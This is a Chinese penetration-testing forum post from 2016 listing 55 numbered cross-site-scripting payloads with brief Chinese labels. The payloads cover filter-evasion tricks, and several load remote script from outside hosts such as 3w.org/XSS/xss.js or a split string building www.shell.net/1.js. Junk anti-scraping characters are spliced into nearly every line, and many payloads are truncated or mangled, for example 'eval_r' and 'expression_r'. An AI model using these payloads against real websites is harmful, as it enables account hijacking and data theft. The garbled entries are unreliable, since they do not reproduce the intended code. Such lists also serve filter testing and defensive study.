中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入4 \, X$ S: j# `/ X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 L! n& x( P& p* g5 `$ B( l(99)另类弹框: k% D6 U$ T9 ^; ^2 ]  o/ J8 Q
<q/oncut=alert()>1
  l! u# h% F, C! b4 o/ M& R5 Q<s/onclick=alert()>b
, q7 P. X; P. F% Q. k; _ <XSS=" onclick="alert(1)//">clickme</SSX=">$ M( y2 W& I6 q/ H
<zzz onclick=alert`1`>clickme</zzz> 0 r9 N) q5 Q: M9 n* l7 Y
<a onclick=alert`1`>clickme</a>
' H) S. O% T$ ]4 @<a=">clickme</a=">
1 u, ?6 U  h! O" \" ?<a=">clickme</a>
' f; k; J6 z' F4 o<z=">clickme</z=">
; p" D2 G0 y& ^" D4 O<z onclick=alert`1`>clickme</z>5 c5 e+ ^0 I$ y: v7 I

5 N; g5 z( [# l3 S+ i5 J7 p(2)IMG标签XSS使用JavaScript命令
) i$ a. F: U3 W3 P" j<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 o( [+ y5 ?' {( s  T$ F: r5 l5 g. H! y- O# r9 G* y& P: E
(3)IMG标签无分号无引号! ?0 I2 O. g" M. Q, L
<IMG SRC=javascript:alert(‘XSS’)>" K3 s6 O% h$ R

+ B/ T+ f$ H0 R6 l* S3 S' E(4)IMG标签大小写不敏感
5 e9 b# o' U2 N8 _6 r<IMG SRC=JaVaScRiPt:alert(‘XSS’)>! R0 R& ~6 w' t, {0 m5 E4 n

% o# C$ n* D8 l9 [$ f(5)HTML编码(必须有分号)
, R- h3 d0 E2 e3 a, b6 n  S0 m<IMG SRC=javascript:alert(“XSS”)>
: V9 p0 P1 e% @1 [# p
4 W" i6 o: I/ B5 m2 H8 y. `4 Z9 _(6)修正缺陷IMG标签
# d& s" B  m$ i- [9 H6 h: [. R$ a! {<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- @  F6 @# T5 b5 e

; y5 P" U  b' D4 I$ @. P! W(7)formCharCode标签(计算器)1 A$ g% L& ?6 u8 b5 {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 K: x! G  {% Z9 n

/ |+ `5 _4 |# f5 b" I(8)UTF-8的Unicode编码(计算器)
% [# V. ^# R8 L( C7 h4 t<IMG SRC=jav..省略..S')>6 Z# P9 Y$ q9 \: S$ K0 K
, S1 }( O: H6 b% m4 i& L# V; S$ N3 ~8 V5 H
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ R' k. n; D9 z9 e( g1 u  j<IMG SRC=jav..省略..S')>
8 V  z+ |0 {$ h/ U2 s
- h6 Z) Z, D% @. @(10)十六进制编码也是没有分号(计算器)# ~+ b( |, v8 ~+ K6 M$ Y" |* h
<IMG SRC=\'#\'" /span>
+ k1 l4 x) a7 L4 `; L( b* }- S( c3 Y& [0 P: j$ c
(11)嵌入式标签,将Javascript分开& B, \; e7 {4 F) L
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 n1 h" v, D# Z3 K& y3 p: W8 I" t; p0 a2 ^
(12)嵌入式编码标签,将Javascript分开
, W0 }3 n- ?& y5 {<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# x% Y/ ]: j' C1 z' C% c) A
1 v+ M# D7 Q( b) B(13)嵌入式换行符6 i: ^8 J/ d3 H  p  K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
, x; j: D8 V& ^& ~" o
/ k1 i. y4 M& u+ {) S( Q4 k# y(14)嵌入式回车
. u5 ]" }& J! S& }2 o! U# g+ A' ?3 @<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>% x) d4 p( P& z0 O- U3 k6 B

8 {8 p: |9 U9 u' P+ G7 Y2 H(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- ^: N- _! a( M0 ^" ?% f3 a<IMG SRC=\'#\'" /span>
  H4 G. h3 s& W  x' z
9 n, L" n: X8 ^5 p(16)解决限制字符(要求同页面)2 f* D( b+ \( ^6 O, ~- q2 D7 ~
<script>z=’document.’</script>3 R8 v3 {4 y5 m7 p
<script>z=z+’write(“‘</script>" N5 L7 M% @' A% p% K6 q6 Q7 g
<script>z=z+’<script’</script>, D9 t& v$ C2 C& m0 s9 T
<script>z=z+’ src=ht’</script>3 F6 z0 l8 X, D7 A0 G% c
<script>z=z+’tp://ww’</script>
: O6 E( x/ [8 S<script>z=z+’w.shell’</script>* O" }* a/ R7 n$ u  |
<script>z=z+’.net/1.’</script>2 Z5 w: g8 f( k1 a( F) s. T
<script>z=z+’js></sc’</script>2 j3 y% [0 l) A$ g; G
<script>z=z+’ript>”)’</script>
0 m- Z" ~0 k& K& f/ q) Y" N0 z<script>eval_r(z)</script>
- \1 b& ]' J* w4 }
5 A: l) d" r+ m(17)空字符
3 L( ?4 q, ], F- Operl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 P+ @5 P, k% Q/ c$ H
  _' _3 B4 F+ [2 R- T+ ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) F: p. x# j" x7 rperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 N" L  K+ R, z7 J

' p4 Z& W( O1 x% O(19)Spaces和meta前的IMG标签  X4 ~/ |. N" b. M; n& m2 y
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
7 t8 @& y9 q0 v5 a# B5 F- y  i2 @" Y, k7 ?( p1 o
(20)Non-alpha-non-digit XSS" ~% Y8 D; D3 t0 I3 f2 L5 Z4 A$ s
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>: F2 ]- s0 Q. w% C

7 w! x, d9 R* t$ b5 ]" R, r3 I3 Z(21)Non-alpha-non-digit XSS to 29 p* B7 w( o3 n8 r
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% S0 g, f1 y6 t: {1 X
: g; _  X8 q  ~; z(22)Non-alpha-non-digit XSS to 3
4 D* k4 F- `0 ?( c( b5 g3 g# F<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; M; g# `/ [# Q5 m. |6 N

" c' a+ H8 z. S" e4 a* }1 Q! U(23)双开括号9 L1 ^2 _" L8 s, a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>- ]2 ]6 P* y" H! }

) U* P+ O& J8 O2 E. _2 E& J0 z(24)无结束脚本标记(仅火狐等浏览器)
6 Y+ D0 s8 X! i$ s4 H  ^1 @<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; C- }' \* W" }* V! J

: }* |$ |$ h8 R(25)无结束脚本标记2; D( D& \  w. a. z0 P
<SCRIPT SRC=//3w.org/XSS/xss.js>
  w+ X% R. I. Q$ p
, h: d2 ?8 B5 d7 @1 R1 Z" L(26)半开的HTML/JavaScript XSS% i. X& c, w2 {+ u5 b4 H
<IMG SRC=\'#\'" /span>% x: |; w2 J8 e3 R+ K

: U) f. w& J7 l(27)双开角括号
: z2 P2 w3 D# a/ i& p" X<iframe src=http://3w.org/XSS.html <
' P9 j8 Q# Q! @( B: w
5 w; }5 Y, \* B& e(28)无单引号 双引号 分号" C; I$ ?- ]5 U
<SCRIPT>a=/XSS/' ?) J, x) \! E/ n  [
alert(a.source)</SCRIPT>
% @. m! B" M2 e3 Q9 D  d. q" w  U+ r$ J/ e3 {2 g3 ^0 y3 r' U
(29)换码过滤的JavaScript
  \( e' @7 o- u7 T% P9 B5 p\”;alert(‘XSS’);//
7 R" G( ]: U4 C& N/ P" a9 s9 K; Q$ O- f( a- i* x% o
(30)结束Title标签
) o0 P$ v/ T5 F+ C</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
) F4 R6 b" \( W8 j; k2 ]. Q/ y4 L' ^7 ?: X6 m0 w
(31)Input Image
9 Q& N1 H4 b& `* Q<INPUT SRC=\'#\'" /span># E. k' K6 r% W% _0 ]' u

" Z$ l; |+ B3 z$ S5 k$ H" l! ~(32)BODY Image
' e, }& u4 M" ~# ]8 u7 g<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
; q" ]* \. r) C
3 {0 T9 B) c( K% y6 L% P(33)BODY标签! G3 X' K: E: h6 M. x. Z3 i: J
<BODY(‘XSS’)># ?  V0 S( W& ^3 a9 N

  r& K. x/ o* ]( u+ Z8 O! G(34)IMG Dynsrc
& u) B( {' T& Q6 T# F3 R<IMG DYNSRC=\'#\'" /span>% B9 N1 r: Z9 M4 b7 |9 |

% u. r2 ^/ X5 c1 ?6 o  [/ O(35)IMG Lowsrc
" `2 P" _7 k  _2 W; H' e- o: o" H/ X<IMG LOWSRC=\'#\'" /span># C+ d. P9 d" k  Q

9 h  b0 j3 n9 G+ t8 `/ A) ~(36)BGSOUND& R- g( l  s& R, m% s! D
<BGSOUND SRC=\'#\'" /span>9 E- {' P; z. x: V0 {' ^, y7 b
6 L8 v: J& j: R& P
(37)STYLE sheet
# M2 z8 i% I$ ]1 X  S8 F# Y0 u<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 s4 _2 U( z, b) t
( O0 z: e3 T. ?1 H0 W
(38)远程样式表
6 g4 {( E- x! n7 V<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>$ M  G8 D" ~. p" q9 V( n- h

# W0 m4 ?+ p# t: h% P# M(39)List-style-image(列表式)
2 n& X! _4 N' q' q" ]<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 [) z9 X' R: k* Q
$ v9 ^: U' Z$ J: M(40)IMG VBscript
! T2 ~$ K/ q, v0 u! r<IMG SRC=\'#\'" /STYLE><UL><LI>XSS8 S" ?4 u3 ]4 O' d+ n: M6 R1 b

+ O/ _- j; _: s# V; U+ g; U(41)META链接url/ U/ D: q  h/ b7 [% {. X
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”># j+ }$ ^  F# V6 k) W1 h. p5 a

9 Q: z% s) U* a7 E$ f; _6 o) z(42)Iframe3 z& Z5 n6 g8 O- q( v' S
<IFRAME SRC=\'#\'" /IFRAME>2 T: W% |+ ~8 A* U( K1 {

% j. G, [/ U7 h3 ]) J0 s$ Z(43)Frame4 m! A/ ?( |& p  J
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
4 g& u' A, }4 ~, P! N) z7 v* a! j- `! d& w5 d/ V5 d) d6 N
(44)Table: F4 Q& F! M% h! v/ X( v
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># y+ @2 M; [+ h) p

) u+ D/ {- Z, ~$ ^* x" Z0 S(45)TD' p5 z' s$ [: ^% C+ L3 q% i
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>- ]2 [; }# t* ?& `/ z
5 l  h1 h1 {. T. S$ c
(46)DIV background-image  d* B  }3 {' N( j
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; ]0 K, F# B6 R! z
: f0 `3 y  Z' ?# C' p1 a- d) h
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
3 Z. Q* M* K, ?2 E<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ Y( t2 ^9 }& n. B' s
5 A) g  A7 k: `+ J& `! \(48)DIV expression* t* F% C* N, I2 `' [% x- d" R7 j
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 W% ]; P: i4 W  T; R5 T8 r
4 L2 i: @9 ^# e: N" P(49)STYLE属性分拆表达: E" y) R* A: k7 c
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 T' A) _7 q, X% s% [% T0 _& U
  P) n; U" y- }! l. ]' Z
(50)匿名STYLE(组成:开角号和一个字母开头)
1 e' Q( H, m) h& b7 k<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; q  C7 t3 T& w, v3 x" c
4 W, z3 t) I9 A2 |* d(51)STYLE background-image4 T! U( u" [6 U4 _* G4 ^4 p
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" ]+ \2 E3 O0 f  C
. o% x, ?6 E+ ~/ u1 X(52)IMG STYLE方式' X- M7 i0 |) v, W
exppression(alert(“XSS”))’>
% }: @8 R# M- P" d2 D9 b2 c4 o5 X" o' f7 q! `
(53)STYLE background
5 A/ M, V/ @8 s6 x1 ~! s<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- n/ `" P  R# v9 V* W, d
4 [: N* k$ ~( t+ ~; T- Z(54)BASE
- D% K( B. l6 x, V1 i/ o/ r# F; \% C<BASE HREF=”javascript:alert(‘XSS’);//”>
# q# V+ A2 s& Q2 `/ B" f- q! O# S. [9 D) X
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 c1 \" Z4 W5 B' _' I0 x+ Q1 F
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>/ b, h6 g8 n) T0 H




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2